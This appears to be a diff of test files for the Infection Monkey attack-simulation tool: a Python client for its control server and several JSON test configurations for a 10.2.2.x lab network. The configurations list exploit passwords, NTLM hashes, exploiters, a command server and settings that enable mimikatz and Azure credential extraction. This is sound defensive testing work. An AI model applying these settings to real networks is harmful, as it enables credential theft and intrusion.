@ -0,0 +1,49 @@
import requests

# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
import logging

NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
                '8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
LOGGER = logging.getLogger(__name__)


class MonkeyIslandRequests(object):

    def __init__(self, server_address):
        self.addr = "https://{IP}/".format(IP=server_address)
        self.token = self.try_get_jwt_from_server()

    def try_get_jwt_from_server(self):
        try:
            return self.get_jwt_from_server()
        except requests.ConnectionError as err:
            LOGGER.error(
                "Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr))
            assert False

    def get_jwt_from_server(self):
        resp = requests.post(self.addr + "api/auth",
                             json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
                             verify=False)
        return resp.json()["access_token"]

    def get(self, url, data=None):
        return requests.get(self.addr + url,
                            headers=self.get_jwt_header(),
                            params=data,
                            verify=False)

    def post(self, url, data):
        return requests.post(self.addr + url,
                             data=data,
                             headers=self.get_jwt_header(),
                             verify=False)

    def post_json(self, url, dict_data):
        return requests.post(self.addr + url,
                             json=dict_data,
                             headers=self.get_jwt_header(),
                             verify=False)

    def get_jwt_header(self):
        return {"Authorization": "JWT " + self.token}


@ -0,0 +1,184 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"1234",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"root",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.4",
"10.2.2.5"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"ElasticGroovyExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}


@ -0,0 +1,186 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"1234",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"root",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.3",
"10.2.2.2"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"HadoopExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [
"e1c0dc690821c13b10a41dccfc72e43a"
],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}


@ -0,0 +1,183 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"Xk8VDTsC",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.16"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"MSSQLExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}


@ -0,0 +1,183 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"1234",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"root",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.8"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"ShellShockExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}


@ -0,0 +1,182 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"Ivrrw5zEzs"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.14",
"10.2.2.15"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}


@ -0,0 +1,180 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.15"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [ "f7e457346f7743daece17258667c936d" ],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}


@ -0,0 +1,192 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"12345678",
"^NgDvY59~8"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.11",
"10.2.2.12"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}


@ -0,0 +1,193 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"1234",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"root",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.23",
"10.2.2.24"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}


@ -0,0 +1,199 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"3Q=(Ge(+&w]*",
"`))jU7L(w}",
"12345678",
"another_one",
"and_another_one",
"one_more"
],
"exploit_user_list": [
"Administrator",
"rand",
"rand2",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 3,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.9",
"10.2.1.10",
"10.2.0.11"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
